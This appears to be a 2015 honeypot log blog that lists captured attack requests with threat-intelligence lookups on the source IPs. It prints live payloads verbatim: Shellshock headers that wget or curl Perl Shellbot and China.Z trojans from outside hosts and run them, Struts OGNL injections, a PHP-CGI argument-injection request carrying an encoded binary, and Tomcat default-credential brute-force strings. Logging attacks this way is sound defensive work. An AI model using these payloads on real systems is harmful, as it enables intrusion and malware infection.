  • Reference: https://isc.sans.edu/api/ip/186.56.42.11
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Montag, 12. Oktober 2015

221.3.153.172 - perl Trojan via Shellshock - CC 69.89.2.153

BEGIN OF HTTP DATA:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close
Clamav report it as:


license.txt: Trojan.Perl.Shellbot-2 FOUND

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt


 The hardcoded C&C address is

69.89.2[.]153

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS20141 Quality Technology Services, LLC.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/69.89.2.153

Samstag, 10. Oktober 2015

199.115.117.88 - GET /admin/i18n/readme.txt

BEGIN OF HTTPS DATA:
2015-10-09 16:41:51
Source IP: 199.115.117.88
Country: US RiskScore: 8.6 Malware: []
GET /admin/i18n/readme.txt HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.8.0

199.115.117[.]88

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS30633 Leaseweb USA, Inc.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/199.115.117.88
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/199.115.117.88
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

61.186.245.211 - com.opensymphony.xwork2

BEGIN OF HTTP DATA:
2015-10-09 20:30:25
Source IP: 61.186.245.211
Country: CN RiskScore: 1 Malware: []
POST /getNews.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 195.169.125.87
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
 END OF DATA

61.186.245[.]211

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.186.245.211
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

177.157.43.206 - /webcalendar/install/index.php

BEGIN OF HTTP DATA:
2015-10-10 01:01:15
Source IP: 177.157.43.206
Country: BR RiskScore: 1 Malware: []
GET /webcalendar/install/index.php HTTP/1.1
TE: deflate,gzip;q=0.3
Keep-Alive: 300
Connection: Keep-Alive, TE
Host: 195.169.125.87
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
Catched my eye because of an available exploit for calendar see here
https://www.exploit-db.com/exploits/18775/

177.157.43[.]206

    Static Source: GeoIP data
  • Country: Brazil
  • ASN: AS18881 Global Village Telecom
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/177.157.43.206
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Donnerstag, 8. Oktober 2015

208.100.26.231 - MongoDB scanning ip

I found the IP scanning and sending random data to almost all services on my honeypot.

28 events like
BEGIN OF MONGODB DATA:
2015-10-09 00:11:14
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
GET / HTTP/1.0

208.100.26[.]231

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 208.100.26[.]231

    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000

Mittwoch, 7. Oktober 2015

208.100.26.230 - Several FTP attempts

BEGIN OF FTP DATA:
2015-10-08 02:08:56
Source IP: 208.100.26.230
Country: US RiskScore: 1 Malware: []
 Basically every access method was tried to use, in the logs I can see
  • HTTP
  • Kerberos
  • Lanman
  • etc.

208.100.26[.]230

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.230
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Dienstag, 6. Oktober 2015

62.210.157.90 - shellbot via 23.229.121.186

BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"
When I try to download the malware, Zonealarm reports a
Backdoor.Perl.Shellbot.s


62.210.157[.]90

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.210.157.90
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

23.229.121[.]186

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36352 ColoCrossing
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/23.229.121.186

Sonntag, 4. Oktober 2015

187.210.107.242 - wget from 79.99.248.2

BEGIN OF HTTP DATA:
2015-10-04 16:57:03
Source IP: 187.210.107.242
Country: MX RiskScore: 10 Malware:
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 79.99.248.2/TEST231;curl 79.99.248.2/TEST231;fetch 79.99.248.2/TEST231;lwp-download 79.99.248.2/TEST231;GET 79.99.248.2/TEST231");'
Host: 109.234.106.8
Connection: Close


79.99.248[.]2

    Static Source: GeoIP data
  • Country: Georgia
  • ASN: AS44877 Vtel-Georgia
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/79.99.248.2

187.210.107[.]242

    Static Source: GeoIP data
  • Country: Mexico
  • ASN: AS8151 Uninet S.A. de C.V.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/187.210.107.242
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/187.210.107.242
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Dynamic Source: projecthoneypot.org
  • Last seen: 20 day(s) ago
  • Score: 25 (25 = 100 Spam per day, 75 = 1mio Spam per day)
  • Category: Suspicious (1)


Samstag, 3. Oktober 2015

61.160.247.11 . Authorization: Basic attempts

BEGIN OF HTTP DATA:
2015-10-02 08:08:13
Source IP: 61.160.247.11
Country: CN RiskScore: 1 Malware: []
GET /manager/html HTTP/1.1
Authorization: Basic cm9vdDpzM2NyZXQ=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host:4393160:80

61.160.247[.]11

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.247.11
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Authorization: Basic cm9vdDphZG1pbg==
Authorization: Basic cm9vdDp0b21jYXQ=
Authorization: Basic cm9vdDpyb290
Authorization: Basic cm9vdDpwYXNzd29yZA==
Authorization: Basic cm9vdDpzM2NyZXQ=
Authorization: Basic cm9vdDptYW5hZ2Vy
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Basic YWRtaW46dG9tY2F0
Authorization: Basic YWRtaW46cm9vdA==
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Authorization: Basic YWRtaW46czNjcmV0
Authorization: Basic YWRtaW46bWFuYWdlcg==
Authorization: Basic bWFuYWdlcjphZG1pbg==
Authorization: Basic bWFuYWdlcjp0b21jYXQ=
Authorization: Basic bWFuYWdlcjpyb290
Authorization: Basic bWFuYWdlcjpwYXNzd29yZA==
Authorization: Basic bWFuYWdlcjpzM2NyZXQ=
Authorization: Basic bWFuYWdlcjptYW5hZ2Vy
Authorization: Basic dG9tY2F0OmFkbWlu
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Authorization: Basic dG9tY2F0OnJvb3Q=
Authorization: Basic dG9tY2F0OnBhc3N3b3Jk
Authorization: Basic dG9tY2F0OnMzY3JldA==
Authorization: Basic dG9tY2F0Om1hbmFnZXI=

Mittwoch, 30. September 2015

61.161.130.241 - ChinaZ attempt via 61.160.212.172

BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not thought to see that again :-)
java: Linux.Trojan.Agent FOUND

61.161.130[.]241

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.161.130.241

61.160.212[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.212.172

 

Sonntag, 27. September 2015

113.204.53.134 - com.opensymphony.xwork2.dispatcher

BEGIN OF HTTP DATA:
2015-09-26 14:05:03
Source IP: 113.204.53.134
Country: CN RiskScore: 1 Malware: []
POST /unAuthorizedAccess.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 109.234.106.8
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
To make it better viewable
redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}
 

113.204.53[.]134

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.204.53.134
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt?n=99999999999999999999

Montag, 21. September 2015

46.172.71.251 - simple bash injection

BEGIN OF HTTP DATA:
2015-09-21 20:45:43
Source IP: 46.172.71.251
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
46.172.71[.]251
    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS43110 Joint Ukrainian-American enterprise Ewropol with legal form Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

94.180.115.102 - php Buffer overflow attempt

BEGIN OF HTTP DATA:
2015-09-22 03:24:28
Source IP: 94.180.115.102
Country: RU RiskScore: 1 Malware: []
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
<?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAEDwQAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAACAEAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAA5EMAAAAAAADkQwAAAAAAAAAAEAAAAAAAAQAAAAYAAADgmwAAAAAAAOCbUAAAAAAA4JtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAB1k/mqVVBYIeAHDRYAAAAAYJ4AAGCeAAAAAgAAsAAAAAIAAAD7+yH/f0VMRgIBAQACAD4ADdAbQA+7ZL8XBQCglyITOADdsu67CAUbABoABg8FJwdA5IQ8IcABAAgA2GCT7gNwBHhABwIyIU8cAAAB+cAG9m+NB2SJADyTbQkAEDcGkJ6dkO8HUDAFN+ALN
 The enquoted code decodes to

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n HTTP/1.1
94.180.115[.]102
    Static Source: GeoIP data
  • Country: Russian Federation
  • ASN: AS43478 CJSC ER-Telecom Holding
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/94.180.115.102
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


208.100.26.231 - fire on port 8080

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:24
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^V^C^@^@S^A^@^@O^C^@?G<D7><F7><BA>,<EE><EA><B2>`~<F3>^@<FD><82>{<B9>Ֆ<C8>w<9B><E6><C4><DB><=<DB>o<EF>^Pn^@^@(^@^V^@^S^@
^@f^@^E^@^D^@e^@d^@c^@b^@a^@`^@^U^@^R^@ ^@^T^@^Q^@^H^@^F^@^C^A^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:29
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@qj<81>n0<81>k<A1>^C^B^A^E<A2>^C^B^A
<A4><81>^0\<A0>^G^C^E^@P<80>^@^P<A2>^DESC^BNM<A3>^W0^U<A0>^C^B^A^@<A1>^N0^LESC^FkrbtgtESC^BNM<A5>^Q^X^O19700101000000Z<A7>^F^B^D^_^^<B9>٨^W0^U^B^A^R^B^A^Q^B^A^P^B^A^W^B^A^A^B^A^C^B^A^B
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:34
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@<A4><FF>SMBr^@^@^@^@^H^A@^@^@^@^@^@^@^@^@^@^@^@^@^@^@@^F^@^@^A^@^@<81>^@^BPC NETWORK PROGRAM 1.0^@^BMICROSOFT NETWORKS 1.03^@^BMICROSOFT NETWORKS 3.0^@^BLANMAN1.0^@^BLM1.2X002^@^BSamba^@^BNT LANMAN 1.0^@^BNT LM 0.12^@
 END OF DATA
BEGIN OF TOMCAT DATA:
2015-09-22 00:34:26
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
:^@^@^@/^@^@^@^B^@^@@^B^O^@^A^@=^E^@^@^@^@^@^@^@^@^@^@^@^@/^@^@^@^@^@^@^@^@^@@^_^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:31
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^A^@^@<FD><CE><FA>^K<B0><A0>^@^@^@MMS^T^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^R^@^@^@^A^@^C^@<F0><F0><F0><F0>^K^@^D^@^\^@^C^@N^@S^@P^@
l^@a^@y^@e^@r^@/^@9^@.^@0^@.^@0^@.^@2^@9^@8^@0^@;^@ ^@{^@0^@0^@0^@0^@A^@A^@0^@0^@-^@0^@A^@0^@0^@-^@0^@0^@a^@0^@-^@A^@A^@0^@A^@
-^@0^@0^@0^@0^@A^@0^@A^@A^@0^@A^@A^@0^@}^@^@^@<E0>m<DF>_
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:37
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@Z^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@ ^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DAT
A=(COMMAND=version))
 END OF DATA
 
Although I am not able to read the exact try, there have been several different events.

208.100.26[.]231
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Sonntag, 20. September 2015

50.118.172.34 / 195.169.125.87 - HTTP javascript/html submission

BEGIN OF HTTP DATA:
2015-09-20 23:58:45
Source IP: 50.118.172.34
Country: US RiskScore: 1 Malware: []
GET /administrator/index.php HTTP/1.1
Host: 195.169.125.87
Accept-Language: en,en-us;q=0.7,es;q=0.3
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Connection: close
Content-Type: text/html
Content-Length: 2221
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: utf-8;q=0.7,*;q=0.7

<html><body><script type="text/javascript">ANCHORFREE_VERSION="413161526"</script><script type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(/^(.*,)?(11C)(,.*)?$/g.exec(_AF2$.CT)!=null){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/par.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}document.write("<style type='text/css' title='AFc_css"+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{} .AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>");})();</script><style type='text/css'>.AFhss_dpnone{display:none;width:0;height:0}</style><img src="about:blank"id="AFhss_trk"name="AFhss_trk"style="display:none"/><div id="AFhss_dfs"class="AFhss_dpnone"><div id="AFhss_adrp0"class="AFhss_dpnone"></div><div id="AFhss_adrp1"class="AFhss_dpnone"></div><div id="AFhss_adrp2"class="AFhss_dpnone"></div><div id="AFhss_adrp3"class="AFhss_dpnone"></div><div id="AFhss_adrp4"class="AFhss_dpnone"></div><div id="AFhss_adrp5"class="AFhss_dpnone"></div><div id="AFhss_adrp6"class="AFhss_dpnone"></div><div id="AFhss_adrp7"class="AFhss_dpnone"></div><div id="AFhss_adrp8"class="AFhss_dpnone"></div><div id="AFhss_adrp9"class="AFhss_dpnone"></div></div><script type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(_AF2$.TOP==1){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/41.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}})()</script>Hello World</body></html>
50.118.172[.]34
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/50.118.172.34

195.169.125[.]87
    Static Source: GeoIP data
  • Country: Netherlands
  • ASN: AS1103 SURFnet, The Netherlands
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.169.125.87

205.164.32[.]102
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/205.164.32.102

Montag, 14. September 2015

195.141.90.114 - M'expr 1330 +7 and 1344 - 7

BEGIN OF HTTP DATA:
2015-09-14 23:55:34
Source IP: 195.141.90.114
Country: CH RiskScore: 1 Malware: []
GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @ HTTP/1.0
Host: oc.johest.de
Cookie: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
User-Agent: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Referer: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Although I find it a bit funny to find 1337 in my logs, I believe it should not be there :-)

195.141.90[.]114
    Static Source: GeoIP data
  • Country: Switzerland
  • ASN: AS6730 Sunrise Communications AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.141.90.114
The following requests have been seen in this kind of attack.

GET / HTTP/1.0
GET /admin.cgi HTTP/1.0
GET /administrator.cgi HTTP/1.0
GET /agora.cgi HTTP/1.0
GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0
GET /analyse.cgi HTTP/1.0
GET /apps/web/vs_diag.cgi HTTP/1.0
GET /axis-cgi/buffer/command.cgi HTTP/1.0
GET /b2-include/b2edit.showposts.php HTTP/1.0
GET /bandwidth/index.cgi HTTP/1.0
GET /bigconf.cgi HTTP/1.0
GET /cartcart.cgi HTTP/1.0
GET /cart.cgi HTTP/1.0
GET /catalog/index.cgi HTTP/1.0
GET /ccbill/whereami.cgi HTTP/1.0
GET /cgi-bin/ HTTP/1.0
GET /cgi-bin/14all-1.1.cgi HTTP/1.0
GET /cgi-bin/14all.cgi HTTP/1.0
GET /cgi-bin/%2f/admin.html HTTP/1.0
GET /cgi-bin/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0
